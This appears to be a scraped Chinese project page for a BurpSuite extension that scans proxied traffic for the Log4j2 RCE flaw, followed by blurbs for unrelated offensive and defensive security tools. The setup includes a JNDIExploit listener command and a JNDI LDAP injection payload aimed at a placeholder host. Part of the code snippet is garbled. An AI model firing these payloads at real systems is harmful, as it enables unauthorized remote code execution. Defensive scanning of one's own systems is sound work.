BurpSuite Extension: Log4j RCE Scanner

Overview

Log4j2 RCE Scanner

作者:key@元亨实验室

小广告:实验室纳新招人,岗位方向有安全研究(攻防、漏洞)、威胁情报(APT分析)、内部安全(SDL、安全研发),简历投递至邮箱:c2VjdXJpdHlAemhvbmdmdS5uZXQ=

前言

这是一个用于扫描近期爆出的Log4j2 RCE漏洞的BurpSuite插件,其原理就是基于BurpSuite提供的被动式扫描API,对流经Burp Proxy模块的流量进行全量扫描,扫描作用域为:请求参数(JSON字段、正常请求参数、Cookie参数、XML字段、Mulitpart)、请求头(请求自带请求头与自定义请求头)。

它与其他插件的区别:

  1. 一个点一个Payload(Hash区分),便于追踪漏洞位置;
  2. 仅支持LDAP Log接口,不支持DNS扫描探测,便于快速定位有效漏洞位置进行自查自检;
  3. 使用Python(Jython)编写,可以非常快速的进行二次开发、代码阅读,例如你可以改造这个项目为SQL注入、XSS盲打的探测插件;
  4. 支持扫描作用域相对较全。

使用方法

  1. 准备工作:该插件用Python(Jython)所写,所以需要你的BurpSuite加载Jython的Jar包,下载地址:https://repo1.maven.org/maven2/org/python/jython-standalone/2.7.2/jython-standalone-2.7.2.jar,BurpSuite加载位置:BurpSuite - Extender - Options - Python Environment - Location of Jython standalone JAR file。

  2. 准备LDAP Log接口:由于插件的特殊性,在不更改插件代码的情况下,建议你准备一台服务器,在上面部署LDAP服务并提供一个Web API给到插件,这里推荐Command2API项目,搭配JNDIExploit使用。

    python Command2Api.py "java -jar JNDIExploit.v1.2/JNDIExploit-1.2-SNAPSHOT.jar -i 0.0.0.0" 9889

  3. 填写配置:下载Python文件到本地,存储在无空格、无特殊符号、无中文的目录下,接着替换如下代码:

    LDAP 服务的主机地址(域名/IP,请注意内、外网环境) # LDAP_PORT -> LDAP 服务的主机端口 return self._helpers.urlEncode("${jndi:ldap://LDAP_HOST:LDAP_PORT/" + random_md5 + "}")">
    # LDAP_API_HOST -> LDAP Log接口的主机地址(域名/IP,请注意内、外网环境)
    # LDAP_API_PORT -> LDAP Log接口的主机端口
    # LDAP_API_PORT -> LDAP Log接口的路由
    # 建议搭配Command2API项目一起使用,其他接口请自行更改代码
    url = "http://LDAP_API_HOST:LDAP_API_PORT/LDAP_API_ROUTE"
    # LDAP_HOST -> LDAP 服务的主机地址(域名/IP,请注意内、外网环境)
    # LDAP_PORT -> LDAP 服务的主机端口
    return self._helpers.urlEncode("${jndi:ldap://LDAP_HOST:LDAP_PORT/" + random_md5 + "}")

  4. 加载插件:BurpSuite加载位置:BurpSuite - Extender - Extensions - Burp Extensions - Add。

  5. 开始扫描:浏览器挂上BurpSuite代理,让流量流经BurpSuite,插件会自动扫描,或者你可以选择结合爬虫的方式将爬虫流量过到BurpSuite进行扫描。

  6. 扫描结果:扫描结果会在Burp Dashboard中展示出来,并且有具体的请求报文,如下图所示,分别是Command2API与LDAP服务接收的日志(由于该漏洞的触发特殊性,建议对这些日志和BurpSuite流量进行保存)以及Burp的扫描结果。

version de mi tool de kali linux para miertuxzzzz digo, termux >:)

Msf-Tool 1.0 Termux apt install git -y apt install python apt install python3 apt install python3-pip apt install metasploit ---- ---- git clone ht

BruhGera 1 Feb 20, 2022
DoSer.py - Simple DoSer in Python

DoSer.py - Simple DoSer in Python What is DoSer? DoSer is basically an HTTP Denial of Service attack that affects threaded servers. It works like this

8 Sep 02, 2022
GitGuardian Shield: protect your secrets with GitGuardian

Detect secret in source code, scan your repo for leaks. Find secrets with GitGuardian and prevent leaked credentials. GitGuardian is an automated secrets detection & remediation service.

GitGuardian 1.2k Dec 27, 2022
Vulnerability Scanner & Auto Exploiter You can use this tool to check the security by finding the vulnerability in your website or you can use this tool to Get Shells

About create a target list or select one target, scans then exploits, done! Vulnnr is a Vulnerability Scanner & Auto Exploiter You can use this tool t

Nano 108 Dec 04, 2021
This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.

webapp-wordlists This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version co

Podalirius 396 Jan 08, 2023
Getting my gitlab commit history into github

🔰 ᵀᴱᴸᴱᴳᴿᴬᴹ ᴴᴬᶜᴷ ᴮᴼᵀ 🔰 The owner would not be responsible for any kind of bans due to the bot. • ⚡ INSTALLING ⚡ • • 🛠️ Lᴀɴɢᴜᴀɢᴇs Aɴᴅ Tᴏᴏʟs 🔰 • If

Santiago Chiesa 1 Dec 24, 2021
Easily retargetable and hackable interactive disassembler with IDAPython-compatible plugin API

ScratchABit is an interactive incremental disassembler with data/control flow analysis capabilities. ScratchABit is dedicated to the effor

Paul Sokolovsky 380 Dec 28, 2022
The next level Python obfuscator, nearly impossible to deobfuscate.

🐸 Kramer 🐸 Kramer is a next level obfuscation tool written in Python3 allowing you to obfuscate your Python3 code easily and securely. It uses Berse

Billy 114 Dec 26, 2022
the swiss army knife in the hash field. fast, reliable and easy to use

hexxus Hexxus is a fast hash cracking tool which checks more than 30 thousand passwords in under 4 seconds and can crack the following types bcrypt sh

enigma146 17 Apr 05, 2022
Tor Relay availability checker, for using it as a bridge in countries with censorship

Tor Relay Availability Checker This small script downloads all Tor Relay IP addresses from onionoo.torproject.org and checks whether random Relays are

ValdikSS 161 Dec 30, 2022
xray多线程批量扫描工具

Auto_xray xray多线程批量扫描工具 简介 xray社区版貌似没有批量扫描,这就让安服仔使用起来很不方便,扫站得一个个手动添加,非常难受 Auto_xray目录下记得放xray,就跟平时一样的。 选项1:oneforall+xray 输入一个主域名,自动采集子域名然后添加到xray任务列表

1frame 13 Nov 09, 2022
A windows post exploitation tool that contains a lot of features for information gathering and more.

Crowbar - A windows post exploitation tool Status - ✔️ This project is now considered finished. Any updates from now on will most likely be new script

29 Nov 20, 2022
A secure way of storing your passwords.

StrongBox 🔐 A secure way of storing your passwords. 🔑 Why to use StrongBox? StrongBox makes it possible to have a random generated strong password i

Dylan Tintenfich 5 Dec 25, 2021
Let's you scan the entire internet in a couple of hours and identify all Minecraft servers on IPV4

Minecraft-Server-Scanner Let's you scan the entire internet in a couple of hours and identify all Minecraft servers on IPV4 Installation and running i

116 Jan 08, 2023
A proxy for asyncio.AbstractEventLoop for testing purposes

aioloop-proxy A proxy for asyncio.AbstractEventLoop for testing purposes. When tests writing for asyncio based code, there are controversial requireme

aio-libs 12 Dec 12, 2022
client attack remotely , this script was written for educational purposes only

client attack remotely , this script was written for educational purposes only, do not use against to any victim, which you do not have permission for it

9 Jun 05, 2022
Exploit for CVE-2021-3129

laravel-exploits Exploit for CVE-2021-3129

Ambionics Security 228 Nov 25, 2022
Hack any account sending fake nitro QR code (only for educational purpose)

DISCORD_ACCOUNT_HACKING_TOOL ( EDUCATIONAL PURPOSE ) Hack any account sending fake nitro QR code (only for educational purpose) Start my program token

Novy 7 Jan 07, 2022
Open source vulnerability DB and triage service.

OSV - Open Source Vulnerabilities OSV is a vulnerability database and triage infrastructure for open source projects aimed at helping both open source

Google 893 Jan 04, 2023
Scan publicly accessible assets on your AWS cloud environment

poro Description Scan for publicly accessible assets on your AWS environment Services covered by this tool: AWS ELB API Gateway S3 Buckets RDS Databas

9rnt 134 Dec 16, 2022